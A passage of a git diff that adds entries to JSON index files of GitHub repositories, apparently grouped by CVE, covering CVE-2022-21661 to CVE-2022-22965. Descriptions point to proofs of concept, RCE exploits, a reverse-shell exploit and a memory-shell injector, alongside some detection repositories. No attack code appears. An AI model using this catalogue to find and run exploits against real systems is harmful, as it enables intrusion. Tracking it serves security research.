+ "created_at": "2023-02-08T04:58:57Z",
+ "updated_at": "2024-02-03T11:46:18Z",
+ "pushed_at": "2023-05-10T01:10:08Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 633180220,
+ "name": "CVE-2022-21661-PoC",
+ "full_name": "sealldeveloper\/CVE-2022-21661-PoC",
+ "owner": {
+ "login": "sealldeveloper",
+ "id": 120470330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120470330?v=4",
+ "html_url": "https:\/\/github.com\/sealldeveloper"
+ },
+ "html_url": "https:\/\/github.com\/sealldeveloper\/CVE-2022-21661-PoC",
+ "description": "A Python PoC of CVE-2022-21661, inspired from z92g's Go PoC",
+ "fork": false,
+ "created_at": "2023-04-27T00:36:16Z",
+ "updated_at": "2024-02-23T07:11:22Z",
+ "pushed_at": "2023-04-27T00:50:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 739025859,
"name": "CVE-2022-21661",
diff --git a/2022/CVE-2022-21839.json b/2022/CVE-2022-21839.json
new file mode 100644
index 0000000000..81d5f1220d
--- /dev/null
+++ b/2022/CVE-2022-21839.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 587390406,
+ "name": "CVE-2022-21839-",
+ "full_name": "lolin19\/CVE-2022-21839-",
+ "owner": {
+ "login": "lolin19",
+ "id": 104766804,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104766804?v=4",
+ "html_url": "https:\/\/github.com\/lolin19"
+ },
+ "html_url": "https:\/\/github.com\/lolin19\/CVE-2022-21839-",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-10T16:34:02Z",
+ "updated_at": "2023-01-10T16:34:02Z",
+ "pushed_at": "2023-01-10T16:42:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-21882.json b/2022/CVE-2022-21882.json
index efcc29e54b..1e891a7967 100644
--- a/2022/CVE-2022-21882.json
+++ b/2022/CVE-2022-21882.json
@@ -152,5 +152,35 @@
"watchers": 6,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 630777901,
+ "name": "CVE-2022-21882",
+ "full_name": "dishfwk\/CVE-2022-21882",
+ "owner": {
+ "login": "dishfwk",
+ "id": 131247034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131247034?v=4",
+ "html_url": "https:\/\/github.com\/dishfwk"
+ },
+ "html_url": "https:\/\/github.com\/dishfwk\/CVE-2022-21882",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-21T06:14:06Z",
+ "updated_at": "2023-04-21T06:15:47Z",
+ "pushed_at": "2023-04-26T11:01:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-21894.json b/2022/CVE-2022-21894.json
index cdd5f0d48d..6794876f56 100644
--- a/2022/CVE-2022-21894.json
+++ b/2022/CVE-2022-21894.json
@@ -67,6 +67,96 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 612635950,
+ "name": "batondrop_armv7",
+ "full_name": "Wack0\/batondrop_armv7",
+ "owner": {
+ "login": "Wack0",
+ "id": 2650838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4",
+ "html_url": "https:\/\/github.com\/Wack0"
+ },
+ "html_url": "https:\/\/github.com\/Wack0\/batondrop_armv7",
+ "description": "An implementation of baton drop (CVE-2022-21894) for armv7 (MSM8960)",
+ "fork": false,
+ "created_at": "2023-03-11T14:38:13Z",
+ "updated_at": "2024-02-17T08:47:36Z",
+ "pushed_at": "2023-03-11T14:46:39Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 626737095,
+ "name": "BlackLotusDetection",
+ "full_name": "bakedmuffinman\/BlackLotusDetection",
+ "owner": {
+ "login": "bakedmuffinman",
+ "id": 28766981,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28766981?v=4",
+ "html_url": "https:\/\/github.com\/bakedmuffinman"
+ },
+ "html_url": "https:\/\/github.com\/bakedmuffinman\/BlackLotusDetection",
+ "description": "Created to help detect IOCs for CVE-2022-21894: The BlackLotus campaign",
+ "fork": false,
+ "created_at": "2023-04-12T04:05:42Z",
+ "updated_at": "2023-04-12T04:06:54Z",
+ "pushed_at": "2023-04-12T04:13:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 626751306,
+ "name": "BlackLotus-Detection",
+ "full_name": "qjawls2003\/BlackLotus-Detection",
+ "owner": {
+ "login": "qjawls2003",
+ "id": 35247051,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35247051?v=4",
+ "html_url": "https:\/\/github.com\/qjawls2003"
+ },
+ "html_url": "https:\/\/github.com\/qjawls2003\/BlackLotus-Detection",
+ "description": "Public repo for anything CVE-2022-21894",
+ "fork": false,
+ "created_at": "2023-04-12T05:01:50Z",
+ "updated_at": "2023-04-12T05:15:56Z",
+ "pushed_at": "2023-04-12T05:31:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": true,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 696622822,
"name": "CVE-2022-21894-Payload-New",
diff --git a/2022/CVE-2022-21907.json b/2022/CVE-2022-21907.json
index 6f71f903e2..3086ca0022 100644
--- a/2022/CVE-2022-21907.json
+++ b/2022/CVE-2022-21907.json
@@ -404,6 +404,66 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 632224259,
+ "name": "CVE-2022-21907",
+ "full_name": "cassie0206\/CVE-2022-21907",
+ "owner": {
+ "login": "cassie0206",
+ "id": 90564331,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90564331?v=4",
+ "html_url": "https:\/\/github.com\/cassie0206"
+ },
+ "html_url": "https:\/\/github.com\/cassie0206\/CVE-2022-21907",
+ "description": "2022 Spring Prof. 謝續平",
+ "fork": false,
+ "created_at": "2023-04-25T01:13:51Z",
+ "updated_at": "2023-05-17T08:52:27Z",
+ "pushed_at": "2023-06-25T07:11:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 637001964,
+ "name": "CVE-2022-21907-RCE",
+ "full_name": "EzoomE\/CVE-2022-21907-RCE",
+ "owner": {
+ "login": "EzoomE",
+ "id": 99851303,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99851303?v=4",
+ "html_url": "https:\/\/github.com\/EzoomE"
+ },
+ "html_url": "https:\/\/github.com\/EzoomE\/CVE-2022-21907-RCE",
+ "description": "CVE-2022-21907漏洞RCE PoC",
+ "fork": false,
+ "created_at": "2023-05-06T07:50:08Z",
+ "updated_at": "2023-05-06T07:50:53Z",
+ "pushed_at": "2023-05-22T03:14:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 679736679,
"name": "CVE-2022-21907",
diff --git a/2022/CVE-2022-22274.json b/2022/CVE-2022-22274.json
index eed45b2ce1..21fa78223c 100644
--- a/2022/CVE-2022-22274.json
+++ b/2022/CVE-2022-22274.json
@@ -1,4 +1,64 @@
[
+ {
+ "id": 588980352,
+ "name": "Sonic_CVE-2022-22274_poc",
+ "full_name": "4lucardSec\/Sonic_CVE-2022-22274_poc",
+ "owner": {
+ "login": "4lucardSec",
+ "id": 71567033,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71567033?v=4",
+ "html_url": "https:\/\/github.com\/4lucardSec"
+ },
+ "html_url": "https:\/\/github.com\/4lucardSec\/Sonic_CVE-2022-22274_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-14T17:15:53Z",
+ "updated_at": "2024-01-22T02:42:51Z",
+ "pushed_at": "2023-01-14T17:18:51Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 652282669,
+ "name": "CVE-2022-22274_poc",
+ "full_name": "forthisvideo\/CVE-2022-22274_poc",
+ "owner": {
+ "login": "forthisvideo",
+ "id": 136259454,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136259454?v=4",
+ "html_url": "https:\/\/github.com\/forthisvideo"
+ },
+ "html_url": "https:\/\/github.com\/forthisvideo\/CVE-2022-22274_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-11T16:56:53Z",
+ "updated_at": "2023-06-11T16:57:33Z",
+ "pushed_at": "2023-06-11T16:57:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 742585090,
"name": "CVE-2022-22274_CVE-2023-0656",
diff --git a/2022/CVE-2022-22620.json b/2022/CVE-2022-22620.json
index 2aca964f26..90688e8449 100644
--- a/2022/CVE-2022-22620.json
+++ b/2022/CVE-2022-22620.json
@@ -58,5 +58,35 @@
"watchers": 8,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 627211251,
+ "name": "dkjiayu.github.io",
+ "full_name": "bb33bb\/dkjiayu.github.io",
+ "owner": {
+ "login": "bb33bb",
+ "id": 5463104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4",
+ "html_url": "https:\/\/github.com\/bb33bb"
+ },
+ "html_url": "https:\/\/github.com\/bb33bb\/dkjiayu.github.io",
+ "description": "POC for cve-2022-22620",
+ "fork": false,
+ "created_at": "2023-04-13T02:20:40Z",
+ "updated_at": "2023-04-13T02:20:37Z",
+ "pushed_at": "2023-01-08T05:31:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-22733.json b/2022/CVE-2022-22733.json
new file mode 100644
index 0000000000..d252bb9863
--- /dev/null
+++ b/2022/CVE-2022-22733.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 632426945,
+ "name": "CVE-2022-22733",
+ "full_name": "Zeyad-Azima\/CVE-2022-22733",
+ "owner": {
+ "login": "Zeyad-Azima",
+ "id": 62406753,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62406753?v=4",
+ "html_url": "https:\/\/github.com\/Zeyad-Azima"
+ },
+ "html_url": "https:\/\/github.com\/Zeyad-Azima\/CVE-2022-22733",
+ "description": "Apache ShardingSphere ElasticJob-UI Privilege Escalation & RCE Exploit",
+ "fork": false,
+ "created_at": "2023-04-25T11:39:40Z",
+ "updated_at": "2024-06-09T10:36:58Z",
+ "pushed_at": "2023-05-22T12:49:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "apache2",
+ "exploit",
+ "java",
+ "shardingsphere",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-2274.json b/2022/CVE-2022-2274.json
index 90621504c0..c2b5a3117e 100644
--- a/2022/CVE-2022-2274.json
+++ b/2022/CVE-2022-2274.json
@@ -65,5 +65,40 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 604407954,
+ "name": "CVE-2022-2274",
+ "full_name": "DesmondSanctity\/CVE-2022-2274",
+ "owner": {
+ "login": "DesmondSanctity",
+ "id": 51109125,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4",
+ "html_url": "https:\/\/github.com\/DesmondSanctity"
+ },
+ "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-2274",
+ "description": "OpenSSL-src Heap Memory Corruption with RSA Private Key Operation : CVE-2022-2274",
+ "fork": false,
+ "created_at": "2023-02-21T01:56:51Z",
+ "updated_at": "2023-02-21T13:15:47Z",
+ "pushed_at": "2023-02-21T02:09:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "advisory",
+ "security",
+ "vulnerabilities",
+ "vulnerability-assessment"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-22947.json b/2022/CVE-2022-22947.json
index b695bf879f..c1f52d0d56 100644
--- a/2022/CVE-2022-22947.json
+++ b/2022/CVE-2022-22947.json
@@ -1570,6 +1570,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 598386749,
+ "name": "CVE-2022-22947",
+ "full_name": "Zh0um1\/CVE-2022-22947",
+ "owner": {
+ "login": "Zh0um1",
+ "id": 94421064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94421064?v=4",
+ "html_url": "https:\/\/github.com\/Zh0um1"
+ },
+ "html_url": "https:\/\/github.com\/Zh0um1\/CVE-2022-22947",
+ "description": "CVE-2022-22947注入哥斯拉内存马",
+ "fork": false,
+ "created_at": "2023-02-07T01:59:01Z",
+ "updated_at": "2024-02-02T01:46:00Z",
+ "pushed_at": "2023-06-21T15:43:11Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 645770114,
+ "name": "CVE-2022-22947",
+ "full_name": "Le1a\/CVE-2022-22947",
+ "owner": {
+ "login": "Le1a",
+ "id": 97610822,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4",
+ "html_url": "https:\/\/github.com\/Le1a"
+ },
+ "html_url": "https:\/\/github.com\/Le1a\/CVE-2022-22947",
+ "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp",
+ "fork": false,
+ "created_at": "2023-05-26T11:52:22Z",
+ "updated_at": "2023-06-02T03:47:18Z",
+ "pushed_at": "2023-05-27T04:38:31Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 817383255,
"name": "CVE-2022-22947",
diff --git a/2022/CVE-2022-22963.json b/2022/CVE-2022-22963.json
index c09de986f9..933e0ecdf0 100644
--- a/2022/CVE-2022-22963.json
+++ b/2022/CVE-2022-22963.json
@@ -501,6 +501,311 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 589347123,
+ "name": "CVE-2022-22963-POC",
+ "full_name": "iliass-dahman\/CVE-2022-22963-POC",
+ "owner": {
+ "login": "iliass-dahman",
+ "id": 40769568,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40769568?v=4",
+ "html_url": "https:\/\/github.com\/iliass-dahman"
+ },
+ "html_url": "https:\/\/github.com\/iliass-dahman\/CVE-2022-22963-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-15T21:39:20Z",
+ "updated_at": "2023-03-24T18:08:12Z",
+ "pushed_at": "2023-01-22T22:39:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 610851382,
+ "name": "CVE-2022-22963",
+ "full_name": "charis3306\/CVE-2022-22963",
+ "owner": {
+ "login": "charis3306",
+ "id": 84823804,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84823804?v=4",
+ "html_url": "https:\/\/github.com\/charis3306"
+ },
+ "html_url": "https:\/\/github.com\/charis3306\/CVE-2022-22963",
+ "description": "spring cloud function 一键利用工具! by charis 博客https:\/\/charis3306.top\/",
+ "fork": false,
+ "created_at": "2023-03-07T15:57:29Z",
+ "updated_at": "2024-05-09T03:36:19Z",
+ "pushed_at": "2023-06-04T08:02:23Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 613387933,
+ "name": "CVE-2022-22963-PoC",
+ "full_name": "lemmyz4n3771\/CVE-2022-22963-PoC",
+ "owner": {
+ "login": "lemmyz4n3771",
+ "id": 116111418,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116111418?v=4",
+ "html_url": "https:\/\/github.com\/lemmyz4n3771"
+ },
+ "html_url": "https:\/\/github.com\/lemmyz4n3771\/CVE-2022-22963-PoC",
+ "description": "CVE-2022-22963 RCE PoC in python",
+ "fork": false,
+ "created_at": "2023-03-13T13:28:55Z",
+ "updated_at": "2023-07-07T22:25:02Z",
+ "pushed_at": "2023-03-14T15:23:12Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 615687765,
+ "name": "CVE-2022-22963_Reverse-Shell-Exploit",
+ "full_name": "J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit",
+ "owner": {
+ "login": "J0ey17",
+ "id": 72118225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72118225?v=4",
+ "html_url": "https:\/\/github.com\/J0ey17"
+ },
+ "html_url": "https:\/\/github.com\/J0ey17\/CVE-2022-22963_Reverse-Shell-Exploit",
+ "description": "CVE-2022-22963 is a vulnerability in the Spring Cloud Function Framework for Java that allows remote code execution. This python script will verify if the vulnerability exists, and if it does, will give you a reverse shell.",
+ "fork": false,
+ "created_at": "2023-03-18T11:43:00Z",
+ "updated_at": "2024-04-27T08:51:47Z",
+ "pushed_at": "2023-03-18T11:47:55Z",
+ "stargazers_count": 22,
+ "watchers_count": 22,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 22,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 616814586,
+ "name": "CVE-2022-22963",
+ "full_name": "Mustafa1986\/CVE-2022-22963",
+ "owner": {
+ "login": "Mustafa1986",
+ "id": 27927358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4",
+ "html_url": "https:\/\/github.com\/Mustafa1986"
+ },
+ "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2022-22963",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-21T06:14:35Z",
+ "updated_at": "2023-03-21T06:16:01Z",
+ "pushed_at": "2023-03-21T06:15:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 625969417,
+ "name": "CVE-2022-22963-Exploit",
+ "full_name": "SourM1lk\/CVE-2022-22963-Exploit",
+ "owner": {
+ "login": "SourM1lk",
+ "id": 116470756,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116470756?v=4",
+ "html_url": "https:\/\/github.com\/SourM1lk"
+ },
+ "html_url": "https:\/\/github.com\/SourM1lk\/CVE-2022-22963-Exploit",
+ "description": "Rust-based exploit for the CVE-2022-22963 vulnerability",
+ "fork": false,
+ "created_at": "2023-04-10T14:12:58Z",
+ "updated_at": "2023-05-31T19:48:01Z",
+ "pushed_at": "2023-04-11T13:46:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 629041592,
+ "name": "Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE",
+ "full_name": "randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE",
+ "owner": {
+ "login": "randallbanner",
+ "id": 99814847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99814847?v=4",
+ "html_url": "https:\/\/github.com\/randallbanner"
+ },
+ "html_url": "https:\/\/github.com\/randallbanner\/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-17T13:54:06Z",
+ "updated_at": "2023-12-10T00:17:36Z",
+ "pushed_at": "2023-04-17T14:01:46Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 635879677,
+ "name": "CVE-2022-22963",
+ "full_name": "gunzf0x\/CVE-2022-22963",
+ "owner": {
+ "login": "gunzf0x",
+ "id": 31874167,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4",
+ "html_url": "https:\/\/github.com\/gunzf0x"
+ },
+ "html_url": "https:\/\/github.com\/gunzf0x\/CVE-2022-22963",
+ "description": "Binaries for CVE-2022-22963",
+ "fork": false,
+ "created_at": "2023-05-03T16:45:06Z",
+ "updated_at": "2023-05-03T17:19:31Z",
+ "pushed_at": "2023-05-04T23:24:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2022-22963",
+ "exploits",
+ "spring-cloud",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 645500414,
+ "name": "RCE-in-Spring-Cloud-CVE-2022-22963",
+ "full_name": "nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963",
+ "owner": {
+ "login": "nikn0laty",
+ "id": 96344826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4",
+ "html_url": "https:\/\/github.com\/nikn0laty"
+ },
+ "html_url": "https:\/\/github.com\/nikn0laty\/RCE-in-Spring-Cloud-CVE-2022-22963",
+ "description": "Exploit for CVE-2022-22963 remote command execution in Spring Cloud Function",
+ "fork": false,
+ "created_at": "2023-05-25T19:50:38Z",
+ "updated_at": "2023-05-25T19:54:23Z",
+ "pushed_at": "2023-05-26T21:50:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 660015867,
+ "name": "Exploit-for-CVE-2022-22963",
+ "full_name": "HenriV-V\/Exploit-for-CVE-2022-22963",
+ "owner": {
+ "login": "HenriV-V",
+ "id": 92248859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92248859?v=4",
+ "html_url": "https:\/\/github.com\/HenriV-V"
+ },
+ "html_url": "https:\/\/github.com\/HenriV-V\/Exploit-for-CVE-2022-22963",
+ "description": "An exploit for the CVE-2022-22963 (Spring Cloud Function Vulnerability)",
+ "fork": false,
+ "created_at": "2023-06-29T04:04:50Z",
+ "updated_at": "2024-03-12T07:42:49Z",
+ "pushed_at": "2023-06-29T04:38:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 711317604,
"name": "CVE-2022-22963-Poc-Bearcules",
diff --git a/2022/CVE-2022-22965.json b/2022/CVE-2022-22965.json
index d1eb8e960d..079f1abf72 100644
--- a/2022/CVE-2022-22965.json
+++ b/2022/CVE-2022-22965.json
@@ -2049,6 +2049,100 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 584868904,
+ "name": "Spring4Shell-CVE-2022-22965-POC",
+ "full_name": "ajith737\/Spring4Shell-CVE-2022-22965-POC",
+ "owner": {
+ "login": "ajith737",
+ "id": 72512571,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72512571?v=4",
+ "html_url": "https:\/\/github.com\/ajith737"
+ },
+ "html_url": "https:\/\/github.com\/ajith737\/Spring4Shell-CVE-2022-22965-POC",
+ "description": "User friendly Spring4Shell POC",
+ "fork": false,
+ "created_at": "2023-01-03T18:15:07Z",
+ "updated_at": "2023-01-03T18:15:14Z",
+ "pushed_at": "2023-01-03T18:53:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 608448692,
+ "name": "CVE-2022-22965",
+ "full_name": "c33dd\/CVE-2022-22965",
+ "owner": {
+ "login": "c33dd",
+ "id": 63436417,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63436417?v=4",
+ "html_url": "https:\/\/github.com\/c33dd"
+ },
+ "html_url": "https:\/\/github.com\/c33dd\/CVE-2022-22965",
+ "description": " 🚀 Exploit for Spring core RCE in C [ wip ]",
+ "fork": false,
+ "created_at": "2023-03-02T03:09:39Z",
+ "updated_at": "2023-02-28T17:01:21Z",
+ "pushed_at": "2023-02-28T16:49:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
